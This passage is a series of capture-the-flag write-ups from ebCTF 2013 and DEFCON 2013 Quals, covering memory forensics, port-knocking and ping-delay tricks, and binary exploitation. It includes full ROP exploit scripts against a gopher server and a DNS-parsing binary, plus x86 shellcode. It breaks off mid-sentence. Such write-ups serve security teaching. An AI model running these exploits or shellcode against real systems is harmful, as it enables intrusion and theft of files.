0x00007f7e9b9fe000 0x00007f7e9bbfd000 --- 0x18000 8 1 972 /lib/x86_64-linux-gnu/libpthread-2.15.so 1317 0x00007f7e9bbfd000 0x00007f7e9bbfe000 r-- 0x17000 8 1 972 /lib/x86_64-linux-gnu/libpthread-2.15.so 1317 0x00007f7e9bbfe000 0x00007f7e9bbff000 rw- 0x18000 8 1 972 /lib/x86_64-linux-gnu/libpthread-2.15.so 1317 0x00007f7e9bbff000 0x00007f7e9bc03000 rw- 0x0 0 0 0 1317 0x00007f7e9bc03000 0x00007f7e9bc25000 r-x 0x0 8 1 985 /lib/x86_64-linux-gnu/ld-2.15.so 1317 0x00007f7e9bca2000 0x00007f7e9bd96000 rw- 0x0 0 0 0 1317 0x00007f7e9bd97000 0x00007f7e9be1f000 rw- 0x0 0 0 0 1317 0x00007f7e9be23000 0x00007f7e9be25000 rw- 0x0 0 0 0 1317 0x00007f7e9be25000 0x00007f7e9be26000 r-- 0x22000 8 1 985 /lib/x86_64-linux-gnu/ld-2.15.so 1317 0x00007f7e9be26000 0x00007f7e9be28000 rw- 
0x23000 8 1 985 /lib/x86_64-linux-gnu/ld-2.15.so 1317 0x00007fff39317000 0x00007fff39339000 rw- 0x0 0 0 0 [stack] 1317 0x00007fff393ff000 0x00007fff39400000 r-x 0x0 0 0 0
The python2 heap mappings are at high addresses, and we should find some of the strings in them. So let’s dump the whole address space and search through it.
$ vol.py --profile=LinuxUbuntu1204x64 -f memory.dump linux_dump_map -p 1317 -D output/ $ grep -r 'i hide my' output/ Binary file output/task.1317.0x7f7e9bca2000.vma matches Binary file output/task.1317.0x7fff39317000.vma matches $ strings output/task.1317.0x7f7e9bca2000.vma | grep 'i hide my' i hide my is this where i hide my secrets? $ strings output/task.1317.0x7fff39317000.vma | grep 'i hide my' i hide my
As we can see, it should be
'secrets?'
. So we have the final modified python script :import sys import time import random import signal from Crypto.Cipher import AES key1 = "is this where" key2 = ' i hide my ' key3 = 'secrets?' iv = 'a very random iv' secret = './flag' mode = AES.MODE_CBC def encrypt(signum, frame): key = key1 + key2 + key3 enc = AES.new(key, mode, iv) inp = raw_input("Enter secret: ") diff = len(inp) % 16 if diff != 0: inp += ' ' * (16 - diff) with open(secret, 'wb') as outfile: outfile.write(enc.encrypt(inp)) del key, enc def decrypt(signum, frame): key = key1 + key2 + key3 enc = AES.new(key, mode, iv) with open(secret, 'rb') as infile: print(enc.decrypt(infile.read(48))) del key, enc print(decrypt(0, 0))
and the flag is :
$ python2 ctf.py ebctf{55169c1c241aa20412da94b3fcbf8506}
This challenge was interesting; thank you Eindbazen and NFI for these forensics challenges. We did not have the time to finish any of the others, but we will do them later. We hope to see more forensics challenges like this in future CTFs.
ebCTF 2013: PWN300
gopherd
is a Linux ELF32 gopher server which responds to simple requests: - a request composed of just
"\r\n"
will make gopherd
return its list of files, - a request
"MD5\r\n"
will make gopherd return the content of the file with the matching MD5.
Unfortunately, the server replaces the contents of any file called
"FLAG"
by "ACCESS DENIED".
Step 1: The vuln
The vuln is in the function
ascii_to_bin
used to transform an ASCII MD5 into a binary MD5. A simple buffer overflow can occur because the output buffer (in the caller’s stack frame) is too small to hold a long string. So by requesting a long string, we are able to overwrite the return address of the caller function.
But there is another problem in
ascii_to_bin
function! The function logically uses two ASCII chars to generate one binary byte, but it iterates over strlen(input_string)
so it generates the correct binary for the hash we send but also writes len(input_string)
garbage after it, based on what comes after input_string
that we can’t control. So, if we just give
gopherd
a hash that will overwrite the return address of the caller, we will also fill the caller’s arguments with garbage. So here is a part of read_from_client
: We can see that, directly after the call to
ascii_to_bin
, the function calls hashlist_find
with hashlist_addr
as first argument. hashlist_addr
is an argument of the caller that has been randomly overwritten by ascii_to_bin
. So to get past the call to
hashlist_find
, hashlist_addr
needs to be a valid pointer with [ptr + 4] == 0
(because hashlist_find
simply iterates over the values in [ptr + 4]
and zero will make it return immediately without any problem). An address from the beginning of .data
will be perfect. Step 2: the sploit
So, at this point, here is the format of our exploit string:
sploit = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + ret_addr + 'AAAAAAAA' + hashlist_addr
It seems that ROP would be a good idea here, so let’s start! The first thing to do is to set
ret_addr
to a pop_pop_ret
address to remove hashlist_addr
from the stack. After that, we will be in a totally controlled ROP environment. BUT: there is another problem! The length of the
read
that gopherd
performs is only 255 bytes. And we know that: - each address is encoded on 8 bytes (addresses must be encoded in ASCII for
ascii_to_bin
), - we consume 96 chars to trigger the vuln in an exploitable way.
So we can just use:
(255 - 96) / 8 = 19
values in our ROP payload: it won’t be enough to perform an "open/read/write"
payload. So we need to find a stack pivot!
RopMount
didn’t find a good stack pivot in gopherd
. But we know that ebCTF is using Ubuntu 12.04 LTS, so let’s try in the libc!
$ python2 ropmount.py --dump "pop esp; ret" remote_libc.so.6 --- pop esp; ret: [base + 0x38b4] pop esp;ret ....
We have some nice and simple stack pivot in the remote libc!
So the attack will consist in 3 phases:
-
Step 1:
- ROP in
gopherd
to leak an address of the libc, - use this addr to build step 2 and 3.
- ROP in
-
Step 2:
- ROP to read stage 3 and put it in at a known location and pivot on it!
-
Step 3:
- full ROP with no length limitation,
-
I chose the following method:
- read the file name from the socket,
- open it,
- read it,
- send content to the socket!
Step 3: The full script
Here is the code used for each step with comments:
import socket
import struct
import sys
import time

SERVERD = "54.217.15.93"
PORTD = 7070
REMOTE = SERVERD, PORTD
LIBC = "./remote_libc.so.6"

# Filler (in ascii-hex form) placed before the saved return address of the
# caller of ascii_to_bin.  The write-up states that 96 chars are consumed by
# the trigger: 72 filler chars + 3 encoded dwords of 8 chars each.
PADDING = 'A' * 72


###HELPERS
def int_to_strformat(x):
    """Return x as the 8 hex digits that the remote ascii_to_bin turns back into x.

    The 32-bit value is byte-swapped (packed little-endian, re-read
    big-endian) and zero-padded to 8 lowercase hex digits.  Formatting with
    ``{:08x}`` instead of slicing ``hex()`` avoids the trailing ``L`` that
    Python 2 appends to long integers.
    """
    swapped = struct.unpack(">I", struct.pack("<I", x))[0]
    return "{0:08x}".format(swapped)


def ropchain_to_str(ropchain):
    """Return the ascii-hex encoding of every address in ropchain.stack.dump()."""
    return "".join(int_to_strformat(addr) for addr, _size in ropchain.stack.dump())


###EXPLOIT
def main():
    """Run the three ROP stages against REMOTE and print what the server sends back."""
    # Imported here so the helpers above stay importable without RopMount.
    import ropmount

    ##STEP 1
    # The address in DATA with [ptr + 4] == 0
    hashlist_addr = int_to_strformat(0x0804C0C0)
    # We ROP on the gopherd binary
    rpc = ropmount.rop_from_files(["./gopherd"])
    # Here is the pop_pop_ret to clean the stack before ROP
    pop_pop_ret = rpc.find("{2,2} pop REG32; ret")
    # The presumed FD of our socket
    socket_fd = 4
    # Get the GOT addr of read
    read_got = rpc.get_symbols()['read.got'].value
    # Build STEP1 ROP (write was not into gopherd PLT)
    # Just doing send(socket_fd, read_got_addr, 4, 0)
    ropchain = rpc.assemble("call send,{0},{1},4,0".format(socket_fd, read_got))
    # Common start of both exploit strings: filler, new return address,
    # one dummy dword, then the pointer that hashlist_find must accept.
    prefix = (PADDING +
              int_to_strformat(pop_pop_ret.vaddr.dump()[0]) +
              '42424242' +
              hashlist_addr)
    # Build the full exploit string for STEP1
    sploit = prefix + ropchain_to_str(ropchain)
    # Send Step 1 and recv read addr in remote libc
    s = socket.create_connection(REMOTE)
    s.send(sploit + "\r\n")
    addr = s.recv(4)
    s.close()
    read_addr = struct.unpack("<I", addr)[0]

    ##STEP 2
    # Now we ROP on gopherd AND the libc
    full_rpc = ropmount.rop_from_files(["./gopherd", LIBC])
    # Get libc_base from leaked addr + read offset into libc
    libc_base = read_addr - full_rpc.mapfile[LIBC].get_symbols()['read'].value
    print("libc base : {0}".format(hex(libc_base)))
    # Tell ropmount where the remote libc is located to craft the RopStack
    full_rpc.mapfile[LIBC].fix_baseaddr(libc_base)
    # Buffer used to store filename
    buff = 0x0804C0C0
    # New stack location for the pivot
    new_stack = buff + 100
    # Assemble STEP2 :
    #  - read STEP3 into new_stack
    #  - set esp to new_stack
    ropchain_load = full_rpc.assemble(
        'call read,{1},{0},0x1000; set esp,{0}'.format(new_stack, socket_fd))
    # Build the full exploit string for STEP2
    sploit = prefix + ropchain_to_str(ropchain_load)
    # Send STEP2
    s = socket.create_connection(REMOTE)
    s.send(sploit + "\r\n")
    time.sleep(1)
    # Now remote is waiting for STEP3

    ##STEP 3
    # The presumed fd of the newly opened file
    file_fd = socket_fd - 1
    # Assemble STEP3
    #  - read filename from socket_fd into buff
    #  - open file
    #  - read file into buff
    #  - write buff into socket_fd
    last_rop = full_rpc.assemble(
        "call read,{1},{0},50; call open,{0},4;call read,{2},{0},100; call write,{1},{0},100".format(
            buff, socket_fd, file_fd))
    # We are not passing through ascii_to_bin anymore: raw binary ROP
    s.send(last_rop.stack.dump('raw'))
    time.sleep(1)
    # Now remote is waiting for filename
    s.send("./goproot/FLAG")
    # print content of filename
    print("------")
    print(s.recv(100))


if __name__ == "__main__":
    main()
Step 4: Launch
$ python2 client.py libc base : 0xf7617000 ------ 0h my g0d, I am defeat. Here, take this: ebCTF{35a6673b2243c925e02e85dfa916036f}
- a request just composed of
ebCTF 2013: Network challenges: NET100, NET200, NET300
NET100: index.php?-s: Post-attack network log analysis
OMG, Eindbazen got hacked. Can you figure out what this evil hacker did? http://ebctf.nl/files/da021f41e137fa42501586915d677752/net-100.pcap
For this first networking exercise, we will analyse network logs of an attack against Eindbazen to find what the attacker could do! We are given a clean pcap of the whole attack.
First thing we can notice, is a long UDP “stream” between the attacker and the target. Just before the attack, a POST was done on the web server hosted by the target. You can find the uploaded php script here. We didn’t spend too much time on it since it looked like a “command receiver on UDP”, which was enough information to continue analysing the logs.
Apart from the UDP stream, we could notice kerberos and ssh traffic, not that interesting, and a GET from the target to the attacker, of a file named
rootkit.zip
, quite interesting! We fetched the file but it was password protected. Let’s continue digging. Back at the UDP stream, we searched for commands related to rootkit.zip and found an interesting part of the stream where we can see the zip file being unzipped. What follows looks like commands sending the password to the unzip command, letter by letter:
alongpassword1234
. This password unlocked the zip file, in which we found a file flag.txt, containing “Instead of a rootkit we will just give you a flag:
ebCTF{b78dc61ce895a3856f3520e41c07b1be}
”. Done!
NET200: Who’s there
We found this strange website. http://54.216.81.14/
This website only contains:
112 + 386 + 712 + 1398 + 8771 + 11982 + 15397 + 23984 = 51037
After wondering a while what this addition was supposed to mean (especially since it was wrong and should give the result 62742), we noticed that all these numbers were in the valid port range. That’s when the semantic of this operation struck us: a collection of 8 ports giving a final port, this is exactly the principle of port-knocking.
The idea of this technique is to open a port only for a given client after it knocks on a pre-defined sequence of ports in the right order, which is only known by the server and the trusted users of the protected service.
So we can execute this first series with a simple netcat:
$ for port in 112 386 712 1398 8771 11982 15397 23984; do > netcat -v 54.216.81.14 $port > done netcat: unable to connect to address 54.216.81.14, service 112 netcat: unable to connect to address 54.216.81.14, service 386 [...] netcat: ec2-54-216-81-14.eu-west-1.compute.amazonaws.com (54.216.81.14) 51037 [51037] open So you are knocking me, how about I return the favor? Repeat after me and I will open the last port...
Is it knocking us back and expecting we mimic it? We can confirm that with
tcpdump
:# tcpdump -n -i eth0 'src host 54.216.81.14' 16:25:22.867635 IP 54.216.81.14.1337 > 163.5.55.17.8112: Flags [S], seq 0, win 8192, length 0 16:25:23.869346 IP 54.216.81.14.1337 > 163.5.55.17.33386: Flags [S], seq 0, win 8192, length 0 16:25:24.874334 IP 54.216.81.14.1337 > 163.5.55.17.14712: Flags [S], seq 0, win 8192, length 0 16:25:25.882108 IP 54.216.81.14.1337 > 163.5.55.17.4398: Flags [S], seq 0, win 8192, length 0 16:25:26.885593 IP 54.216.81.14.1337 > 163.5.55.17.1771: Flags [S], seq 0, win 8192, length 0 16:25:27.889869 IP 54.216.81.14.1337 > 163.5.55.17.52313: Flags [S], seq 0, win 8192, length 0 16:25:28.894443 IP 54.216.81.14.1337 > 163.5.55.17.25697: Flags [S], seq 0, win 8192, length 0 16:25:29.900296 IP 54.216.81.14.1337 > 163.5.55.17.932: Flags [S], seq 0, win 8192, length 0 16:25:30.905643 IP 54.216.81.14.1337 > 163.5.55.17.22222: Flags [S], seq 0, win 8192, length 0
OK, so let’s ping it on these exact same ports in that order. But this time, while the service was rejecting instantly all of our
SYN
TCP packets in the first series with a RST
, for this new series, it seems to drop half of the packets and to reject the other half with RST
. Thus, our previous super cool for-loop got stuck in the middle and caused the whole series to fail. So we just changed it to launch the netcat in background and it worked perfectly. This time the 22222 port replied with this message:[Advanced] sequence = 234,781,983,2411,9781,14954,23112,63991 seq_timeout = 15 command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 32154 -j ACCEPT tcpflags = fin,urg,!ack cmd_timeout = 30 stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 32154 -j ACCEPT
We recognized it was a chunk of configuration for the
knockd
daemon, which can be used to set up port-knocking on a UNIX host. It is easy to read: we just have to knock on another series of ports given by the sequence
option with the appropriate TCP flags, specified by the tcpflags
option, and we will be given access to port 32154. This time, we could not use
netcat
because it does not allow us to specify arbitrary TCP flags, but, since we already had a script ready for the NET300 challenge using Scapy, we also used it for this new series:from scapy.all import * ports = [234,781,983,2411,9781,14954,23112,63991] for p in ports: print(send(IP(dst="54.216.81.14")/TCP(dport=p,flags="FU")))
And just connected normally to the final port which gave us the flag of this challenge:
$ netcat -v 54.216.81.14 32154 netcat: ec2-54-216-81-14.eu-west-1.compute.amazonaws.com (54.216.81.14) 32154 [32154] open ebCTF{32c64f2542ba4566acff750196ca2e13}
NET300: Hop on a plane!
We found this website which uses a location based access control system. Hop on a plane and hit all target zones! http://54.212.115.245/
What we understood was that this service tries to locate us by pinging our IP from three servers located in the US, in Brazil and in Japan and display our approximate location on the map. The goal is to make that location change by delaying the ping replies we send back to these three servers and make it hop in each of the three circles on the map.
A few of us tried to look for ways to do that using
iptables
or the traffic control in the kernel but it was impossible with the first one and it took them a long time with the second one. Meanwhile, we tried to use the
scapy
Python module to reply to the pings instead of the kernel. We first tried to prevent the kernel from answering, but dropping the ICMP packets with iptables
didn’t work, apparently because the answering part is lower than iptables
in the network stack of the Linux kernel in order to make these replies fast. So we decided to disable these replies globally by enabling the net.ipv4.icmp_echo_ignore_all
. Then, we wrote the Scapy script to respond to ping requests with fine adjustment of
time.sleep()
before our replies, depending on which of the three servers we were replying to. This script worked well, but the results were really random due to network latency and probably our strange solution of replying to pings in userland. So now we had a plane that randomly wandered all over the map… ok great… We tried to adjust the
time.sleep
parameter but the result was just too random to be useful. Another problem was that the sleeps accumulated over our replies because scapy
queues the requests, so requests piled up and, after a while, we were answering with more than one minute of delay. So to fix these problems, we decided to modify the script to spawn threads for the replies, to avoid the accumulation of sleeps, so we could use big delays (30 seconds or so) that would allow us to compensate for the random network delay and finely tune the delays to reach exactly the appropriate locations. But we first modified the first script to make the delays totally random and launched it in the background, just in case…
from scapy.all import *
import random
import time

# The three servers whose pings are answered with a random delay.
SRC = ["54.212.115.245", "54.232.216.98", "54.250.176.246"]


def callback(pkt):
    """Answer an ICMP packet from one of the SRC hosts after a random pause.

    Packets that are not ICMP (IP protocol 1) or that come from another host
    are ignored.  The reply is an echo-reply (type 0) carrying the same raw
    payload, sent after sleeping between 0 and 400 ms.
    """
    ip_layer = pkt[IP]
    if ip_layer.proto != 1:
        return
    if ip_layer.src not in SRC:
        return
    delay_ms = random.randint(0, 400)
    time.sleep(delay_ms / 1000.0)
    reply = IP(dst=pkt[IP].src) / ICMP(type=0, id=0, seq=0) / Raw(load=pkt[Raw].load)
    send(reply)


sniff(
    prn=callback,
    filter="(src host 54.212.115.245 or src host 54.232.216.98 or src host 54.250.176.246) and icmp",
    store=0,
)
And it worked, before we could finish the new script, the first one made us reach the three circles successfully, giving us the flag:
ebCTF{9bd26cbffa30c0ea32c425df220f06b9}
.EBCTF 2013: Clownstorage.net - dimwit - PWN 400
Score 400 Link http://ebctf.nl/files/8210c7065a7ac809297deec98f83e4f6/dimwit We found a strange binary that appears to be doing DNS queries for clownstorage.net, can you break in and gain access to the flag? The server is running on 54.217.6.47 port 50001
The binary is an ELF 64-bit, dynamically linked and not stripped. When first connecting to the address given we receive something like:
$ nc 54.217.6.47 ____ _ _____ ___ _ ____ _____ ___ ____ _ ____ _____ / ___| | / _ \ \ / / \ | / ___|_ _/ _ \| _ \ / \ / ___| ____| | | | | | | | \ \ /\ / /| \| \___ \ | || | | | |_) | / _ \| | _| _| | |___| |__| |_| |\ V V / | |\ |___) || || |_| | _ < / ___ \ |_| | |___ _ \____|_____\___/ \_/\_/ |_| \_|____/ |_| \___/|_| \_\/_/ \_\____|_____(_) _ _ _____ _____ | \ | | ____|_ _| | \| | _| | | | |\ | |___ | | |_| \_|_____| |_| Doritos Infrastructure Monitor Warning Information Techinology [INFO] resolving clownstorage.net [INFO] binding socket [WARNING] binding to port 53 failed, trying 6140 instead [INFO] socket bound [TEST_FAILED] dns timeout
Because the binary was not stripped, it was quite easy to understand what it does. It first checks that the file
flag
exists, then it listens on port 50001, accepts and forks. When a connection is received, it does a
dup2
between the standard output and the socket file descriptor. Then it calls a function named read_motd
which takes the name of a file, reads it, writes it to the standard output, and finally calls the function do_nameserver_test.
The function
do_nameserver_test
tries to create a udp_socket
, first on port 53 (which fails each time) and then on a random port. Thankfully, we have a warning telling us which port it is bound to. When the socket is created it sends a DNS request, then sets up a handler for the signal SIGALRM
which prints: "[TEST_FAILED] dns timeout"
and exits. It then enters in the loop:while (!query_received) // query_received is a global variable initialize to 0 { alarm(5); // if in 5s we have not finish launch a SIGALARM receive_dns(fd); // the name is explicit } puts("[TEST_OK] nameserver up"); fflush(stdin);
Because the alarm is quite annoying when debugging, I personally NOP’ed it out to avoid problems.
Now that we have a global overview of what our program does, the goal will be to exploit the function
receive_dns
in order to gain code execution. Here is the begin of the code to get the first information:import socket import struct #PROFILE = 'local' PROFILE = 'remote' if PROFILE == 'local': HOST = 'localhost' elif PROFILE == 'remote': HOST = '54.217.6.47' PORT = 50001 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _recv_tcp(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r _recv_tcp(' ____ _ _____ ___ _ ____ _____ ___ ____ _ ____ _____ \n / ___| | / _ \\ \\ / / \\ | / ___|_ _/ _ \\| _ \\ / \\ / ___| ____| \n| | | | | | | \\ \\ /\\ / /| \\| \\___ \\ | || | | | |_) | / _ \\| | _| _| \n| |___| |__| |_| |\\ V V / | |\\ |___) || || |_| | _ < / ___ \\ |_| | |___ _ \n \\____|_____\\___/ \\_/\\_/ |_| \\_|____/ |_| \\___/|_| \\_\\/_/ \\_\\____|_____(_)\n \n _ _ _____ _____ \n| \\ | | ____|_ _|\n| \\| | _| | | \n| |\\ | |___ | | \n|_| \\_|_____| |_| \n\nDoritos Infrastructure Monitor Warning Information Techinology\n\n') _recv_tcp('[INFO] resolving clownstorage.net\n') _recv_tcp('[INFO] binding socket\n') r = _recv_tcp('[WARNING] binding to port 53 failed, trying 33501 instead\n') _recv_tcp('[INFO] socket bound') UDP_PORT = int(r.split()[7]) print("UDP_PORT = ", UDP_PORT)
So now lets get a look into
receive_dns
. The function receives up to 0x200 bytes and puts them in a buffer of the same size. It then begins to check whether the received data is correct. The DNS header looks like this:
The program does some checks, first on the flags, then on the ID. Passing the test on the different flags is not hard, but we have a problem with the ID: we don’t know which ID is used because we don’t see the request that the program sends. But it is only 16 bits wide, so we can simply bruteforce it by sending our data with all the possible IDs.
The function then loops to skip the questions that may be contained in the answer: it iterates as many times as the number in
"qdcount"
and reads the size of each labelname
(using the function labelname_len
) and skips them. We have no interest in this part: we can just set qdcount
to 0. It will then loop on the answers for "ancount"
time, copy the label and check if he has a valid answer and then returns. The following code sends the answer to the program:def _send_udp(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return sock.sendto(st, (HOST, UDP_PORT)) # here we will put flag to 0b0000000010000000 and qdcount to 0 def _send_dns(flag, qdcount, ancount, msg, end): FLAG = struct.pack("<H", flag) QDCOUNT = struct.pack("<H", qdcount) ANCOUNT = struct.pack("<H", ancount) NSCOUNT = struct.pack("<H", 0) ARCOUNT = struct.pack("<H", 0) for i in range(65536): ID = struct.pack("<H", i) _send_udp(ID + FLAG + QDCOUNT + ANCOUNT + NSCOUNT + ARCOUNT + msg + end)
A label in the DNS protocol is made of several parts: it begins with a size (which, in this implementation, should be less than 0x3f), followed by the characters. The vulnerability is in the
copy_from_labelname
function:void copy_from_labelname(char *dst, char *src, int pos, int max) { int i = 0; int t; while (src[pos] != 0) { if (pos >= max) { puts('[ABORTING] truncated packet'); fflush(stdout); abort(); } if (src[pos] < 0x3f) { if (src[pos] + pos + 1 > max) { puts('[ABORTING] truncated packet'); fflush(stdout); abort(); } memcpy(dst + i, src + pos + i, src[pos]); i += src[pos]; dst[i] = '.'; i++; pos += src[pos]; } else if (src[pos] <= 0xbf) { puts('[ABORTING] bad packet'); fflush(stdout); abort(); } else { // HERE is a particular case where is the vuln t = ror(((short *)src)[pos / 2], 8) & 0x3fff; if (max - 1 > pos && t < max && t < pos) pos = t; else { puts('[ABORTING] ...'); fflush(stdout); abort(); } } } dst[i] = 0; }
The parameter
max
given to this function is the size returned by the recv
function, the dst
buffer is a buffer of size 0x200. This function seems safe because the destination buffer is the same size as the buffer src
, so we should not be able to overflow it. The problem is in the else branch of the function: we can reset the position and then write more into the destination buffer, which allows us to trigger a buffer overflow and then to ROP. Once we have our buffer overflow, the ROP is quite simple: we will call the function
read_motd
, which takes one argument: the address of the string "flag"
, which is already in the binary. Because we are in x86_64, we will need one gadget to put the address of the string "flag"
in the rdi
register. The gadget I use is simple:
mov edi, dword [rsp+0x30] add rsp, 0x38 ret
I used the tool developed by 0vercl0k (https://github.com/0vercl0k/rp) to find this gadget.
Here is the final part of the exploit:
# this will serv for the padding bytesa = b'\x3e' + 0x3e*b'a' bytesc = b'\x38' + 0x38*b'c' # here we exploit the problem of the function retu = b'\x33' + b'\x34' + b'\x35' + b'\x36' + b'\x37' + b'\x38' + b'\x39' + 0x2d*b'a' + b'\xc0\x0d' + b'\xc0\x0e' + b'\xc0\x0f' + b'\xc0\x10' + b'\xc0\x11' + b'\xc0\x12' #\xc0 permet to be in the particular case, the second element permet to say # the position in the buffer where we will set the pos. ADDR_READ_MOTD = struct.pack("<Q", 0x401360) # the address of the function ADDR_FLAG = struct.pack("<Q", 0x40183b) # the address of the string ADDR_PIVOT = struct.pack("<Q", 0x401500) # the address of the gadget PADD = retu + 2 * bytesa + bytesc # just some padding # the 8*b'a' are the padding because of the add rsp, 0x38 SEND1 = PADD + b'\x28' + ADDR_PIVOT + 8*b'a' + 8*b'a' + 8*b'a' + 8*b'a' SEND2 = b'\x38' + 7*b'a'+ 8*b'a' + ADDR_FLAG + ADDR_READ_MOTD + 0x19*b'x' + b'\x00' SEND = SEND1 + SEND2 _send_dns(0b0000000010000000, 0, 1, SEND, b"a") # Here we recv the answer _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024)
Here is the complete exploit:
import socket import struct #PROFILE = 'local' PROFILE = 'remote' if PROFILE == 'local': HOST = 'localhost' elif PROFILE == 'remote': HOST = '54.217.6.47' PORT = 50001 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) def _send_udp(st, end=b''): if isinstance(st, str): st = bytes(st, 'utf-8') st += end print('Send:', repr(st)) return sock.sendto(st, (HOST, UDP_PORT)) def _recv_tcp(l): if isinstance(l, str): l = len(l) r = s.recv(l) if r: print('Recv:', repr(r)) return r def _send_dns(flag, qdcount, ancount, msg, end): FLAG = struct.pack("<H", flag) QDCOUNT = struct.pack("<H", qdcount) ANCOUNT = struct.pack("<H", ancount) NSCOUNT = struct.pack("<H", 0) ARCOUNT = struct.pack("<H", 0) for i in range(65536): ID = struct.pack("<H", i) _send_udp(ID + FLAG + QDCOUNT + ANCOUNT + NSCOUNT + ARCOUNT + msg + end) _recv_tcp(' ____ _ _____ ___ _ ____ _____ ___ ____ _ ____ _____ \n / ___| | / _ \\ \\ / / \\ | / ___|_ _/ _ \\| _ \\ / \\ / ___| ____| \n| | | | | | | \\ \\ /\\ / /| \\| \\___ \\ | || | | | |_) | / _ \\| | _| _| \n| |___| |__| |_| |\\ V V / | |\\ |___) || || |_| | _ < / ___ \\ |_| | |___ _ \n \\____|_____\\___/ \\_/\\_/ |_| \\_|____/ |_| \\___/|_| \\_\\/_/ \\_\\____|_____(_)\n \n _ _ _____ _____ \n| \\ | | ____|_ _|\n| \\| | _| | | \n| |\\ | |___ | | \n|_| \\_|_____| |_| \n\nDoritos Infrastructure Monitor Warning Information Techinology\n\n') _recv_tcp('[INFO] resolving clownstorage.net\n') _recv_tcp('[INFO] binding socket\n') r = _recv_tcp('[WARNING] binding to port 53 failed, trying 33501 instead\n') _recv_tcp('[INFO] socket bound') UDP_PORT = int(r.split()[7]) print("UDP_PORT = ", UDP_PORT) bytesa = b'\x3e' + 0x3e*b'a' bytesb = b'\x33' + 0x33*b'b' bytesc = b'\x38' + 0x38*b'c' pading = b'\x0b' + 0xb*b'a' retu = b'\x33' + b'\x34' + b'\x35' + b'\x36' + b'\x37' + b'\x38' + b'\x39' + 0x2d*b'a' + b'\xc0\x0d' + b'\xc0\x0e' + b'\xc0\x0f' + b'\xc0\x10' + b'\xc0\x11' + b'\xc0\x12' 
ADDR_READ_MOTD = struct.pack("<Q", 0x401360) ADDR_FLAG = struct.pack("<Q", 0x40183b) ADDR_PIVOT = struct.pack("<Q", 0x401500) PADD = retu + 2 * bytesa + bytesc SEND1 = PADD + b'\x28' + ADDR_PIVOT + 8*b'a' + 8*b'a' + 8*b'a' + 8*b'a' SEND2 = b'\x38' + 7*b'a'+ 8*b'a' + ADDR_FLAG + ADDR_READ_MOTD + 0x19*b'a' + b'\x00' SEND = SEND1 + SEND2 _send_dns(0b0000000010000000, 0, 1, SEND, b"a") _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024) _recv_tcp(1024)
The flag was:
ebctf{c0fa2ef42705a3092cbec827e1777cd5}
.DEFCON 2013 Quals: Linked - Shellcode (ÿäÌ) 3
Score 3 Link http://assets.shallweplayaga.me/linked.txt
This challenge was very simple in itself and didn’t involve reversing a binary or finding a vulnerability :
typedef struct _llist { struct _llist *next; uint32_t tag; char data[100]; llist; and: register char *answer; char *(*func)(); llist *head; ... func = (char *(*)(llist *))userBuf; answer = (char *)(*func)(head); send_string(answer); exit(0); Write me shellcode that traverses the randomly generated linked list, looking for a node with a tag 0x41414100, and returns a pointer to the data associated with that tag, such that the call to send_string will output the answer.
We began connecting to the server and experimenting a few things in order to determine the architecture, maximum length and other information required to write this shellcode.
When sent a longer packet, the service clearly stated that the maximum length was 16 bytes. We quickly narrowed the architecture down to plain x86 and, although we first thought the shellcode had to be NULL-free, we soon discovered that it did not need to be.
So we gave it a first shot, using a few tricks in order to use the lowest number of bytes, but could not squeeze it to less than this shellcode which is 20 bytes-long :
pop edx ; return address pop ebx ; linked-list head push 0x41414100 pop edi myloop: mov ebx, [ebx] cmp [ebx + 4], edi jnz myloop lea eax, [ebx + 8] ; mov eax, ebx + 8 jmp edx
So we began experimenting with shellcodes that did not fully respect the subject but could get us a close-enough result to retrieve the flag. We first tried to test that the second lowest byte was 0x41, but this was not restrictive enough to get the flag, so we tried matching 0x4100.
To do that within 16 bytes, we had to replace our first two pops with a popa, which is only 1 byte long but may totally destroy the stack frame. But since the function that calls our shellcode never returns, as shown in the subject, we don’t really care.
The final result is:
popa ; edi = return addr, esi = linked-list head myloop: mov esi, [esi] cmp word [esi + 4], 0x4100 jnz myloop lea eax, [esi + 8] jmp edi
And we were quite surprised that it worked on the first try. One funny thing to note is that the key it gave us was:
The key is: Who says ESP isn't general purpose!?!?
Hmm, I guess our solution was not the intended one…
For reference, the intended solution, given by an organizer (gynophage) at the end of the CTF was:
mov eax,0x41414100 pop ebx pop ebp leave mov edi,esp scasd jnz 0x7 xchg eax,edi call ebx
DEFCON 2013 Quals: Incest - Shellcode (ÿäÌ) 1
Score 1 I hear banjos. incest.shallweplayaga.me:65535 http://assets-2013.legitbs.net/liabilities/maw http://assets-2013.legitbs.net/liabilities/sis
As the title might suggest, this challenge involves children creation and family betrayal. The two given binaries are ELF64.
The first binary,
maw
, accepts connections from users and does the classic accept
and fork
for each of them. Then, it opens the key file read-only and executes (via execl
) the second binary, sis
. We can already notice that the file descriptor for the key file will also be available in the child sis
, as well as the socket of the client, the numbers of these two file descriptors being passed on the command line. This second program forks after parsing these arguments and setting up a couple of signals and alarms. The parent closes the client’s socket file descriptor, allocates a buffer on the heap (via
calloc
) and reads the content of the key file into this buffer. The child maps a new page, uses recv to read
0x200 bytes from the socket into this page, and directly calls this page. The two new processes then wait in an infinite loop and end up killed by a SIGALRM
set up at the start of the sis
program. The first thing to take away from all this is that we only have to send the raw bytes of a shellcode and it will be directly executed without any trouble or restriction other than being limited to 0x200 bytes, if we call that a restriction…
So we began by writing a simple 3 ×
dup2
and execve(bash)
which allowed us to browse the server and get a few pieces of information about the environment. This allowed us to notice that the key file was only readable by maw
, which dropped its privileges before executing sis
. It was thus impossible to read the key from the shell we had. This convinced us that the only way to read the key was to read the memory of the
sis
parent process (remember: sis
